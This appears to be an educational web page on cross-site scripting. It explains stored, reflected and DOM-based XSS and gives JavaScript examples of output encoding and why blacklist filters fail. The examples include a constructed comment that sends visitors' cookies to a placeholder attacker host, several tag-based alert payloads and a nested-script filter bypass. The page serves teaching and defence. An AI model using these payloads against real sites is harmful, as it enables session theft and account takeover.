Stored XSS

Cyber Security Degrees

What is Cross-Site Scripting?

Cross-site scripting is a client-side attack in which malicious code is injected into a legitimate website or web application. The malicious payload is commonly called the injected script. XSS is one of the most common vulnerability classes in web applications. It happens when a web application generates output that contains user input which has been neither validated nor encoded for the context it is placed in.

XSS lets an attacker target a victim indirectly: the attacker exploits a flaw in a website or web app the victim visits and uses it to deliver malicious code to the victim’s browser.

XSS payloads are almost always JavaScript, since JavaScript underlies most of the browsing experience; in older browsers they could also use now-obsolete technologies such as VBScript, ActiveX, and Flash.

XSS Attack

Because of its potential for serious consequences, XSS is one of the most dangerous web attacks.

An attacker injects the payload into a vulnerable website; the malicious JavaScript then runs in the victim’s browser when the victim visits the affected page. For a reflected payload the victim usually has to be lured to a crafted link by social engineering; for a stored payload, simply visiting the page is enough. The pseudo-code used by the server to display the latest comment on a webpage is shown below.

The script prints the most recent comment from a comments system without encoding it. If the page is vulnerable, an attacker can submit a comment that contains a malicious payload, such as a <script> element carrying JavaScript.

The following HTML will be displayed to the web page visitor.


The malicious script executes as soon as the victim’s browser loads the page. Most of the time the victim neither notices the attack nor can prevent it.
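The stored-XSS flow described above, as an added example that is not part of the original page: a minimal Node.js comment board with an in-memory store, a vulnerable render function that concatenates the saved comment into the page, and the fixed version that encodes every user-controlled value on output. The store, the template, and the attacker’s comment (pointing at the placeholder host attacker.example) are all constructed here for illustration.

```javascript
// Added example, not code from the original page: a minimal comment board that
// shows the stored-XSS flow. The comment store, render functions, and the
// attacker's comment are all constructed here for illustration.

function createStore() {
  return { comments: [] }; // hypothetical in-memory comment store
}

function storeComment(store, author, text) {
  store.comments.push({ author, text }); // saved exactly as submitted
}

function latestComment(store) {
  return store.comments[store.comments.length - 1];
}

// Vulnerable: the stored comment is concatenated straight into the page.
function renderLatestVulnerable(store) {
  const c = latestComment(store);
  return `<div class="comment"><b>${c.author}</b>: ${c.text}</div>`;
}

// Encode the characters that have meaning in an HTML body or quoted attribute,
// so user text is displayed as text instead of being parsed as markup.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Fixed: same template, but every user-controlled value is encoded on output.
function renderLatestSafe(store) {
  const c = latestComment(store);
  return `<div class="comment"><b>${escapeHtml(c.author)}</b>: ${escapeHtml(c.text)}</div>`;
}

// Constructed attacker comment: sends the visitor's cookie to a placeholder host.
const ATTACKER_COMMENT =
  '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>';

// True when the rendered HTML still contains a real <script> element.
function containsScriptElement(html) {
  return /<script[\s>]/i.test(html);
}

// Run the full flow: the attacker posts once, every later visitor gets the same page.
function demo() {
  const store = createStore();
  storeComment(store, "alice", "Nice article!");
  storeComment(store, "mallory", ATTACKER_COMMENT);
  return {
    vulnerable: renderLatestVulnerable(store),
    safe: renderLatestSafe(store),
  };
}

const result = demo();
console.log("vulnerable page:", result.vulnerable);
console.log("fixed page:     ", result.safe);
```

The important detail is that the payload is stored once and served to every subsequent visitor; the fix is applied at output time, not at input time, so the same stored text is harmless no matter how it got into the database.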

XSS Attack Example

Below are common XSS attack vectors. Each is an HTML construct that can carry a script into the web application’s output and so compromise the website’s security.


The script tag can embed JavaScript inline or load it from an external file. This is the simplest XSS payload.


Body tag
The XSS payload can be placed in the body tag using the onload attribute, so it runs as soon as the page finishes loading.

IMG tag
JavaScript placed in an img tag’s attributes will be executed: an event handler such as onerror fires in every browser when the image fails to load, and some older browsers also ran a javascript: URL given as the src.


iframe tag
The iframe tag embeds another HTML page inside the parent page. iframes are commonly used to perpetrate phishing attacks, and an iframe whose src is a javascript: URL executes script directly.


Link tag
Because the link tag is used to load external style sheets, it can be abused to pull attacker-controlled content into the page; older browsers also executed a javascript: URL in its href.


Table tag
Older browsers followed a javascript: URL in the background attribute of a table or table cell (td) tag, executing script instead of loading an image.


div tag
A script can be embedded through the style attribute of a div tag, for example as a background-image URL (older browsers only).


Object tag
The object tag can include content, including script, from an external site.


XSS Types Vulnerabilities

There are three types of XSS vulnerabilities: Stored, Reflected, and DOM Based.

Stored XSS
Stored XSS vulnerabilities occur when the malicious payload is saved by the application (in a database record, a comment, a profile field, or a log) and later served to every user who views the affected page. Stored cross-site scripting is particularly dangerous because the payload does not appear in the URL, so the reflected-XSS filters that some browsers once shipped never saw it, and users trigger it simply by visiting the page.

Reflected XSS
Reflected XSS occurs when user input from the URL or POST data is echoed straight back in the response without being stored; the victim has to be induced to send the crafted request, typically by clicking a link. The XSS filters once built into Chrome, Internet Explorer, and Edge could catch some reflected payloads, but those filters have since been removed from current browsers and cannot be relied on.

DOM Based XSS
In DOM-based XSS the vulnerability is in the page’s own client-side JavaScript, which writes attacker-controlled data (for example from the URL fragment) into the DOM (document object model), rather than in the HTML generated by the server.

XSS Prevention

XSS vulnerabilities can have a variety of impacts, including session hijacking through stolen session cookies or tokens, and forging requests on the victim’s behalf, since script running in the page can read the anti-CSRF tokens it contains. An attacker can use an XSS vulnerability to trick the victim and take over their account. If the victim has administrative rights, the attack may even lead to code execution on the server; this depends on the application and the privileges involved.

To avoid cross-site scripting vulnerabilities, it is crucial to use context-dependent output encoding. In an HTML body, encoding the HTML special characters, such as the angle brackets that open and close tags, is enough; inside a URL, URL (percent) encoding is required instead; and attribute values need their own encoder, because a value in an href or src can be dangerous without containing a single special character.
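Context-dependent output encoding as an added example, not code from the original page: the same hostile profile values are placed into an HTML body, a quoted attribute, a link target, and a URL parameter, each through the encoder its context needs. The profile fields, the template, and the scheme allow-list in safeUrl are all constructed here; the point it makes beyond the text is that HTML encoding alone does nothing against javascript:alert(1) in an href, because that value contains no markup characters.

```javascript
// Added example, not code from the original page: the same user-controlled
// values placed into several output contexts, each with the encoder that
// context requires. The profile fields and render template are constructed.

// HTML body context: neutralise the markup characters.
function encodeForHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Quoted attribute context: encode everything except [A-Za-z0-9] as a hex
// entity, so no character can close the quote or start a new attribute.
function encodeForHtmlAttribute(value) {
  return String(value).replace(/[^A-Za-z0-9]/gu, (ch) => {
    return "&#x" + ch.codePointAt(0).toString(16) + ";";
  });
}

// URL parameter context: percent-encode, so & = < > cannot alter the query.
function encodeForUrlParam(value) {
  return encodeURIComponent(String(value));
}

// href/src context: encoding alone is not enough, because "javascript:alert(1)"
// contains no special characters at all. Allow only http(s) URLs and
// same-origin paths (not protocol-relative //host); anything else becomes an
// inert fragment link. This allow-list is an assumption for the example.
function safeUrl(value) {
  const url = String(value).trim();
  if (/^(https?:\/\/|\/(?!\/))/i.test(url)) return url;
  return "#";
}

// Hypothetical profile page: one user-controlled value per output context.
function renderProfile(user) {
  return [
    `<h1>${encodeForHtml(user.name)}</h1>`,
    `<img alt="${encodeForHtmlAttribute(user.title)}" src="/avatar.png">`,
    `<a href="${encodeForHtmlAttribute(safeUrl(user.site))}">home page</a>`,
    `<a href="/search?q=${encodeForUrlParam(user.query)}">my posts</a>`,
  ].join("\n");
}

// Constructed attacker profile: one payload aimed at each context.
const HOSTILE_USER = {
  name: '<img src=x onerror="alert(1)">',
  title: '" onmouseover="alert(1)',
  site: "javascript:alert(document.cookie)",
  query: "a&b=<x>",
};

console.log(renderProfile(HOSTILE_USER));
```

Note that the link target goes through two steps: safeUrl rejects the dangerous scheme, then encodeForHtmlAttribute makes the surviving value safe to sit inside the quoted attribute. Neither step alone covers both risks.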

Some browsers used to ship an integrated XSS filter that tried to detect reflected cross-site scripting attacks. Such a filter was only ever a partial, last line of defense, and Chrome and Edge have since removed theirs, so a browser filter must not be relied on to minimize the impact of a vulnerability.

Blacklists are not recommended for web developers, because they can be bypassed. Stripping “risky” characters or keywords from the output is also a poor substitute for encoding: a filter that rewrites its input can be tricked into assembling a payload out of fragments it considered harmless, and the altered output no longer matches what any downstream filter expects, allowing a bypass.
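The blacklist problem above, worked through with the tag-based vectors from the earlier list, as an added example that is not code from the original page: a naive filter that deletes script tags is run over one constructed payload per vector, plus a nested script tag that reassembles itself when the inner tag is removed, and the result is compared with plain output encoding. The filter and the payloads are constructed here; which vectors a given browser actually executes varies (event handlers and javascript: iframes work in current browsers, the link, table, div and object variants only in older ones), but the filter fails to touch any of them regardless.

```javascript
// Added example, not code from the original page: the tag-based vectors listed
// earlier run through a naive blacklist filter and through output encoding, to
// show why the blacklist is the wrong tool. Filter and payloads are constructed.

// Naive blacklist: delete every <script> and </script> tag it can find.
function naiveStripScript(html) {
  return html.replace(/<\/?script[^>]*>/gi, "");
}

// Correct alternative: encode the markup characters so nothing is parsed as a tag.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Does the output still contain something the HTML parser treats as a tag?
function containsTag(html) {
  return /<[a-z]/i.test(html);
}

// Constructed payloads, one per vector from the list above, plus a nested
// <script> that reassembles itself once the filter removes the inner tags.
const VECTORS = {
  script: "<script>alert(1)</script>",
  nestedScript: "<scr<script>ipt>alert(1)</scr</script>ipt>",
  body: '<body onload="alert(1)">',
  img: '<img src="x" onerror="alert(1)">',
  iframe: '<iframe src="javascript:alert(1)"></iframe>',
  link: '<link rel="stylesheet" href="javascript:alert(1)">',
  table: '<table background="javascript:alert(1)"><td></td></table>',
  div: '<div style="background-image:url(javascript:alert(1))"></div>',
  object: '<object data="javascript:alert(1)"></object>',
};

// Return the names of the vectors that a given filter leaves as live markup.
function survivors(filter) {
  return Object.keys(VECTORS).filter((name) => containsTag(filter(VECTORS[name])));
}

console.log("survive naive blacklist:", survivors(naiveStripScript));
console.log("survive output encoding:", survivors(escapeHtml));
```

The nested payload is the classic illustration of the second point in the text: the filter removes the inner `<script>` and `</script>`, and the fragments it left behind join up into exactly the tag it was trying to remove. Encoding has no such failure mode because it never tries to recognise the payload; it only makes the angle brackets inert.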